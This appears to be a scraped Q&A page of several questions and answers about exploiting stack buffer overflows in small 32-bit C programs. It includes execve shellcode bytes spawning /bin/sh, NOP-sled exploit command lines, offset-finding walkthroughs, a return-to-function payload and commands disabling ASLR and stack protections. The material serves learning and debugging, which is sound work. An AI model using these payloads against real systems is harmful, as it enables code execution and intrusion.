How to explain this buffer overflow vulnerability in C - c

Given this C program:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[1024];
strcpy(buf, argv[1]);
}
Built with:
gcc -m32 -z execstack prog.c -o prog
Given shell code:
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
The program is exploitable with the commands:
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
where I got the addresses from:
$ objdump -d prog | grep call.*eax
8048387: ff d0 call *%eax
804840f: ff d0 call *%eax
I understand the meaning of the AAAA paddings in the middle, I calculated the 991 based on the length of buf in the program and the length of $EGG.
What I don't understand is why any of these addresses with call *%eax trigger the execution of the shellcode copied to the beginning of buf. As far as I understand, I'm overwriting the return address with 0x8048387 (or the other one), what I don't understand is why this leads to jumping to the shellcode.
I got this far by reading Smashing the stack for fun and profit. But the article uses a different approach of guessing a relative address to jump to the shellcode. I'm puzzled by why this more simple, alternative solution works, straight without guesswork.

The return value of strcpy is the destination (buf in this case) and that's passed using register eax. Thus if nothing destroys eax until main returns, eax will hold a pointer to your shell code.

Related

Why is there the need to use a precise return address for shellcode execution?

I'm trying to understand why in order to successfully execute my shellcode payload, I need to use a specific return address inside the stack.
If I use a different address that is still inside the stack, I either get a SIGSEGV segmentation fault or a SIGILL illegal instruction.
First of all, I have deactivated ASLR on my OS by doing this :
echo 0 > /proc/sys/kernel/randomize_va_space
Here is my vulnerable C code :
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void func (char *arg) {
char buffer[64];
strcpy(buffer, arg);
printf("%s\n", buffer);
}
int main(int argc, char *argv[])
{
func(argv[1]);
return 0;
}
I compiled it in 32 bit using gcc on a 64 bit machine with the following line :
gcc -z execstack -m32 buffer.c -g -o buffer -fno-stack-protector
I thus have an executable stack so that the shellcode is executable and also no stack protector to allow stack smashing.
Here is my shellcode (NOP|shellcode-payload|return-address) :
"\x90"*31 + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\x30\xd5\xff\xff"
I feed this shellcode as an input to the buffer binary using Python2 to gdb as follow :
gdb --args ./buffer $(python2 -c 'print("\x90"*31 + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\x30\xd5\xff\xff")')
By putting a break func in gdb, I can print the following bytes showing a bit of the stack.
If I put at the end of the shellcode any return address that is not in the range : 0xffffd521-0xffffd539. I get either a SIGSEGV or SIGILL why is that ?
For instance, 0xffffd520 is a valid address inside the stack, for what reason it does not work ?
It's not really anything to do with your program or your shellcode, but with the way you are running it. $(...) in shell splits its result into multiple arguments at whitespace, so if the output of python contains whitespace bytes, argv[1] will only get the part of the payload before the first such byte. The address 0xffffd520 has 0x20, space, as one of its bytes, so that'll result in argv[1] containing a truncated version of your payload, which in particular won't contain the correct return address at all, hence crashing.
You should use quotes to force the entire output to be a single argument: "$(python2 ... )"

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!

Shellcode Segfault - testcase vs strcpy

So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a char array and the user not adding the -fno-stack-protector / -z execstack flags for gcc. I've tried turning off ASLR (though I'm unsure if it's relevant?), there is no stack canary or anything involved. I'm using a cyclic offset generator to find the stack offset and using gdb to find the start of the buffer (so I know I have the correct return address). Everything is in gdb so I'm aware there will be an address difference when running outside of gdb, I originally had a NOP sled but removed it to reduce complexity.
So I've reached my wits end... I feel like it might be something at the assembly layer that I'm not understanding/haven't learned. Might be something silly....
First I have a test-case program that just takes the shellcode as a commandline argument which successfully pops the shell:
Compiled with: gcc -m32 -z execstack file.c -o file
#include<stdio.h>
#include<string.h>
int main(int argc, char *argv[])
{
unsigned char shellcode[100];
strcpy(shellcode,argv[1]);
int (*ret)() = (int(*)())shellcode;
ret();
}
root#kali:~/tmp# ./test2 $(python -c 'print
"\xbf\xa0\xbc\xdf\x9c\xda\xda\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0c\x31\x78\x13\x03\x78\x13\x83\xe8\x5c\x5e\x2a\xf6\x97\xc7\x4c\x55\xc1\x9f\x43\x39\x84\x87\xf4\x92\xe5\x2f\x05\x85\x26\xd2\x6c\x3b\xb1\xf1\x3d\x2b\xcb\xf5\xc1\xab\xe4\x97\xa8\xc5\xd5\x35\x4a\x69\x41\xba\xdb\xde\x18\x5b\x2e\x60"')
root#kali:/root/tmp# <-- New shell popped
Next I wanted to try to actually overflow a buffer to overwrite the stored EIP address and run the shellcode, this case continually results in a segfault...
Compiled with: gcc -m32 -z execstack file.c -o file
#include<stdio.h>
#include<string.h>
void login_success(char *password)
{
char pass[60];
strcpy(pass, password);
}
int main(int argc, char *argv[])
{
login_success(argv[1]);
}
the offset to eip is 72 bytes, my shellcode is 72 bytes long + adding the eip overwrite.
Shellcode looks like:
buf = ""
buf += "\xbf\xa0\xbc\xdf\x9c\xda\xda\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0c\x31\x78\x13\x03\x78\x13\x83\xe8\x5c\x5e\x2a\xf6\x97\xc7\x4c\x55\xc1\x9f\x43\x39\x84\x87\xf4\x92\xe5\x2f\x05\x85\x26\xd2\x6c\x3b\xb1\xf1\x3d\x2b\xcb\xf5\xc1\xab\xe4\x97\xa8\xc5\xd5\x35\x4a\x69\x41\xba\xdb\xde\x18\x5b\x2e\x60"
#0xffffd264
buf += "\x64\xd2\xff\xff"
print buf
Running this results in a segmentation fault...
If I step through gdb they both reach the shellcode, I've followed every step and it all their commands are the same up until it has to make a call instruction.
In the images below the strcpy instance is on the left, the test-case is on the right:
I'm not sure if it has to do with the ret instruction from the previous stackframe where the overflow occured? I can provide any additional information if needed. Any information about what I should research further would be appreciated!

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
void main()
{
int *ret;
ret = (int *)&ret + 2; // +2 to get to the return address on the stack
(*ret) = (int)shellcode;
}
Execution result in Segmentation error.
[user1#fedo BOF]$ gcc -o ExitShellCode ExitShellCode.c
[user1#fedo BOF]$ ./ExitShellCode
Segmentation fault (core dumped)
This is the Objdump of the shellcode.a
[user1#fedo BOF]$ objdump -d exitShellcodeaAss
exitShellcodeaAss: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: bb 14 00 00 00 mov $0x14,%ebx
8048059: b8 01 00 00 00 mov $0x1,%eax
804805e: cd 80 int $0x80
System I'm using
fedora Linux 3.1.2-1.fc16.i686
ASLR is disabled.
Debugging with GDB.
gcc version 4.6.2
mmm maybe it is to late to answer to this question, but they might be a passive syntax error. It seems like thet shellcode is malformed, I mean:
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
its not the same as:
char shellcode[]= "\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
although this fix won't help you solving this problem, but have you tried disabling some kernel protection mechanism like: NX bit, Stack Randomization, etc... ?
Based on two other questions, namely How to determine return address on stack? and C: return address of function (mac), i'm confident that you are not overwriting the correct address. This is basically caused due to your assumption, that the return address can be determined in the way you did it. But as the answer to thefirst question (1) states, this must not be the case.
Therefore:
Check if the address is really correct
Find a way for determining the correct return address, if you do not want to use the builtin GCC feature
You can also execute shellcode like in this scenario, by casting the buffer to a function like
(*(int(*)()) shellcode)();
If you want the shellcode be executed in the stack you must compile without NX (stack protector) and with correct permissions.
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
E.g.
#include <stdio.h>
#include <string.h>
const char code[] ="\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
printf("Length: %d bytes\n", strlen(code));
(*(void(*)()) code)();
return 0;
}
If you want to debug it with gdb:
[manu#debian /tmp]$ gdb ./shellcode
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
...
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) b *&code
Breakpoint 1 at 0x4005c4
(gdb) r
Starting program: /tmp/shellcode
Length: 2 bytes
Breakpoint 1, 0x00000000004005c4 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x00000000004005c4 <+0>: mov $0x14,%ebx
0x00000000004005c9 <+5>: mov $0x1,%eax
0x00000000004005ce <+10>: int $0x80
0x00000000004005d0 <+12>: add %cl,0x6e(%rbp,%riz,2)
End of assembler dump.
In this proof of concept example is not important the null bytes. But when you are developing shellcodes you should keep in mind and remove the bad characters.
Shellcode cannot have Zeros on it. Remove the null characters.

Homework - Cannot exploit bufferoverflow

I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux.
Here is my C program
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[500];
if(argc==2)
{
strcpy(buffer, argv[1]); //vulnerable function
}
return 0;
}
This is the shellcode I am using, which corresponds to simple /bin/ls
\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80
I inject this shellcode in gdb using following command
run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')
As I step through the application, it generates SIG FAULT on final ret instruction. At that point EIP is correctly set to 0xffffd30c. This address is addressable and contains series of NOP, followed by my shell code as shown in the payload.
I have disabled the ASLR
sudo echo 0 > /proc/sys/kernel/randomize_va_space
and also compiled my binary using fno-stack-protector option.
Any idea what's the cause of SIGSEGV ?
I have answered my own question, the problem was "Executable Stack Protection", where in stack memory cannot be executed. This can be disabled in gcc as follows
gcc -z execstack
Have you disabled stack smashing protection in GCC (-fno-stack-protector)?
How to turn off gcc compiler optimization to enable buffer overflow

Resources